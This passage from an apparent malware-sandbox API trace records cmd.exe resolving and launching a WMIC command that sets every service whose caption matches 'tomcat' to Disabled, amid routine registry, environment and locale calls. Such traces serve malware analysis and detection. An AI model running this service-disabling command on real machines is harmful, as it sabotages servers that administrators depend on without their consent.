lpBuffer=0x4cbfa9c*(BaseAddress=0x4cc0000, AllocationBase=0x4cc0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0120.413] GetConsoleOutputCP () returned 0x1b5 [0120.414] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0120.414] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0120.414] _get_osfhandle (_FileHandle=1) returned 0x3c [0120.414] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0120.414] _get_osfhandle (_FileHandle=1) returned 0x3c [0120.415] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0120.415] _get_osfhandle (_FileHandle=1) returned 0x3c [0120.415] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0120.415] _get_osfhandle (_FileHandle=0) returned 0x38 [0120.415] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0120.415] _get_osfhandle (_FileHandle=0) returned 0x38 [0120.415] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0120.415] GetEnvironmentStringsW () returned 0x4d17e08* [0120.415] FreeEnvironmentStringsA (penv="A") returned 1 [0120.416] GetEnvironmentStringsW () returned 0x4d17e08* [0120.416] FreeEnvironmentStringsA (penv="A") returned 1 [0120.416] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cbea48 | out: phkResult=0x4cbea48*=0x94) returned 0x0 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x0, lpData=0x4cbea54*=0x7e, lpcbData=0x4cbea50*=0x1000) returned 0x2 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x4, lpData=0x4cbea54*=0x1, lpcbData=0x4cbea50*=0x4) returned 0x0 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x0, lpData=0x4cbea54*=0x1, lpcbData=0x4cbea50*=0x1000) returned 0x2 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x4, lpData=0x4cbea54*=0x0, lpcbData=0x4cbea50*=0x4) returned 0x0 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x4, lpData=0x4cbea54*=0x40, lpcbData=0x4cbea50*=0x4) returned 0x0 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x4, lpData=0x4cbea54*=0x40, lpcbData=0x4cbea50*=0x4) returned 0x0 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x0, lpData=0x4cbea54*=0x40, lpcbData=0x4cbea50*=0x1000) returned 0x2 [0120.416] RegCloseKey (hKey=0x94) returned 0x0 [0120.416] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cbea48 | out: phkResult=0x4cbea48*=0x94) returned 0x0 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x0, lpData=0x4cbea54*=0x40, lpcbData=0x4cbea50*=0x1000) returned 0x2 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x4, lpData=0x4cbea54*=0x1, lpcbData=0x4cbea50*=0x4) returned 0x0 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x0, lpData=0x4cbea54*=0x1, lpcbData=0x4cbea50*=0x1000) returned 0x2 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x4, lpData=0x4cbea54*=0x0, lpcbData=0x4cbea50*=0x4) returned 0x0 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x4, lpData=0x4cbea54*=0x9, lpcbData=0x4cbea50*=0x4) returned 0x0 [0120.416] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x4, lpData=0x4cbea54*=0x9, lpcbData=0x4cbea50*=0x4) returned 0x0 [0120.417] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4cbea4c, lpData=0x4cbea54, lpcbData=0x4cbea50*=0x1000 | out: lpType=0x4cbea4c*=0x0, lpData=0x4cbea54*=0x9, lpcbData=0x4cbea50*=0x1000) returned 0x2 [0120.417] RegCloseKey (hKey=0x94) returned 0x0 [0120.417] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29829 [0120.417] srand (_Seed=0x5ad29829) [0120.417] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'" [0120.417] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'" [0120.417] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0120.417] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d19d60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0120.417] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0120.417] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.417] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.417] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0120.417] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0120.417] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0120.417] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0120.417] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0120.417] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0120.417] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0120.417] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0120.417] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0120.417] GetEnvironmentStringsW () returned 0x4d17e08* [0120.418] FreeEnvironmentStringsA (penv="A") returned 1 [0120.418] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.418] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.418] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0120.418] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0120.418] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0120.418] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0120.418] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0120.418] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0120.418] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0120.418] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0120.418] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4cbf820 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0120.418] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4cbf820, lpFilePart=0x4cbf818 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4cbf818*="Desktop") returned 0x1d [0120.418] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0120.418] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4cbf5a0 | out: lpFindFileData=0x4cbf5a0) returned 0x4d105c8 [0120.418] FindClose (in: hFindFile=0x4d105c8 | out: hFindFile=0x4d105c8) returned 1 [0120.418] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4cbf5a0 | out: lpFindFileData=0x4cbf5a0) returned 0x4d105c8 [0120.418] FindClose (in: hFindFile=0x4d105c8 | out: hFindFile=0x4d105c8) returned 1 [0120.418] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0120.418] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4cbf5a0 | out: lpFindFileData=0x4cbf5a0) returned 0x4d105c8 [0120.419] FindClose (in: hFindFile=0x4d105c8 | out: hFindFile=0x4d105c8) returned 1 [0120.419] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0120.419] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0120.419] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0120.419] GetEnvironmentStringsW () returned 0x4d17e08* [0120.419] FreeEnvironmentStringsA (penv="=") returned 1 [0120.419] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0120.420] GetConsoleOutputCP () returned 0x1b5 [0120.420] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0120.420] GetUserDefaultLCID () returned 0x409 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4cbf950, cchData=128 | out: lpLCData="0") returned 2 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4cbf950, cchData=128 | out: lpLCData="0") returned 2 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4cbf950, cchData=128 | out: lpLCData="1") returned 2 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0120.420] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0120.420] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0120.422] GetConsoleTitleW (in: lpConsoleTitle=0x4d1aaf0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.422] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0120.422] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0120.422] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0120.422] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0120.422] GetEnvironmentVariableW (in: lpName="tomcat", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.422] _wcsicmp (_String1="tomcat", _String2="CD") returned 17 [0120.422] _wcsicmp (_String1="tomcat", _String2="ERRORLEVEL") returned 15 [0120.422] _wcsicmp (_String1="tomcat", _String2="CMDEXTVERSION") returned 17 [0120.422] _wcsicmp (_String1="tomcat", _String2="CMDCMDLINE") returned 17 [0120.422] _wcsicmp (_String1="tomcat", _String2="DATE") returned 16 [0120.422] _wcsicmp (_String1="tomcat", _String2="TIME") returned 6 [0120.422] _wcsicmp (_String1="tomcat", _String2="RANDOM") returned 2 [0120.423] _wcsicmp (_String1="tomcat", _String2="HIGHESTNUMANODENUMBER") returned 12 [0120.423] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0120.423] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0120.423] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0120.423] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0120.423] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0120.423] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0120.423] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0120.425] GetConsoleTitleW (in: lpConsoleTitle=0x4cbf638, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.425] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0120.425] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0120.425] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0120.425] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0120.425] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0120.425] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0120.425] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0120.425] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0120.425] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0120.425] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0120.425] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0120.425] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0120.425] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0120.425] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0120.425] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0120.425] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0120.425] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0120.425] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0120.425] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0120.425] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0120.425] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0120.425] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0120.425] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0120.425] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0120.425] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0120.425] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0120.425] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0120.425] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0120.425] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0120.425] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0120.426] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0120.426] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0120.426] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0120.426] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0120.426] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0120.426] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0120.426] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0120.426] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0120.426] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0120.426] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0120.426] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0120.426] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0120.426] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0120.426] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0120.426] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0120.426] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0120.426] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0120.426] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0120.426] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0120.426] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0120.426] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0120.426] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0120.426] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0120.426] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0120.426] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0120.426] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0120.426] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0120.426] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0120.426] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0120.426] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0120.426] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0120.426] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0120.426] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0120.426] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0120.426] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0120.426] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0120.426] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0120.426] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0120.426] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0120.426] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0120.426] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0120.427] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0120.427] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0120.427] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0120.427] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0120.427] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0120.427] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0120.427] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0120.427] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0120.427] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0120.427] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0120.427] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0120.427] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0120.427] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0120.427] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0120.427] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0120.427] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0120.427] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0120.427] SetErrorMode (uMode=0x0) returned 0x0 [0120.427] SetErrorMode (uMode=0x1) returned 0x0 [0120.427] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d105d0, lpFilePart=0x4cbf144 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4cbf144*="Desktop") returned 0x1d [0120.427] SetErrorMode (uMode=0x0) returned 0x1 [0120.427] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0120.427] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0120.433] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.434] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.434] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4cbeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4cbeed0) returned 0xffffffff [0120.435] GetLastError () returned 0x2 [0120.435] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.435] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4cbeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4cbeed0) returned 0xffffffff [0120.435] GetLastError () returned 0x2 [0120.435] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.435] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4cbeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4cbeed0) returned 0xffffffff [0120.435] GetLastError () returned 0x2 [0120.435] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.435] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4cbeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4cbeed0) returned 0xffffffff [0120.435] GetLastError () returned 0x2 [0120.435] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.435] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4cbeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4cbeed0) returned 0x4d1b2b8 [0120.436] FindClose (in: hFindFile=0x4d1b2b8 | out: hFindFile=0x4d1b2b8) returned 1 [0120.436] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x4cbeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4cbeed0) returned 0xffffffff [0120.436] GetLastError () returned 0x2 [0120.436] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x4cbeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4cbeed0) returned 0x4d1b2b8 [0120.436] FindClose (in: hFindFile=0x4d1b2b8 | out: hFindFile=0x4d1b2b8) returned 1 [0120.436] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0120.436] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0120.436] GetConsoleTitleW (in: lpConsoleTitle=0x4cbf3c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.437] InitializeProcThreadAttributeList (in: lpAttributeList=0x4cbf2f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4cbf2d4 | out: lpAttributeList=0x4cbf2f0, lpSize=0x4cbf2d4) returned 1 [0120.437] UpdateProcThreadAttribute (in: lpAttributeList=0x4cbf2f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x4cbf2dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4cbf2f0, lpPreviousValue=0x0) returned 1 [0120.437] GetStartupInfoW (in: lpStartupInfo=0x4cbf328 | out: lpStartupInfo=0x4cbf328*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0120.437] _wcsnicmp (_String1="COPYCMD", 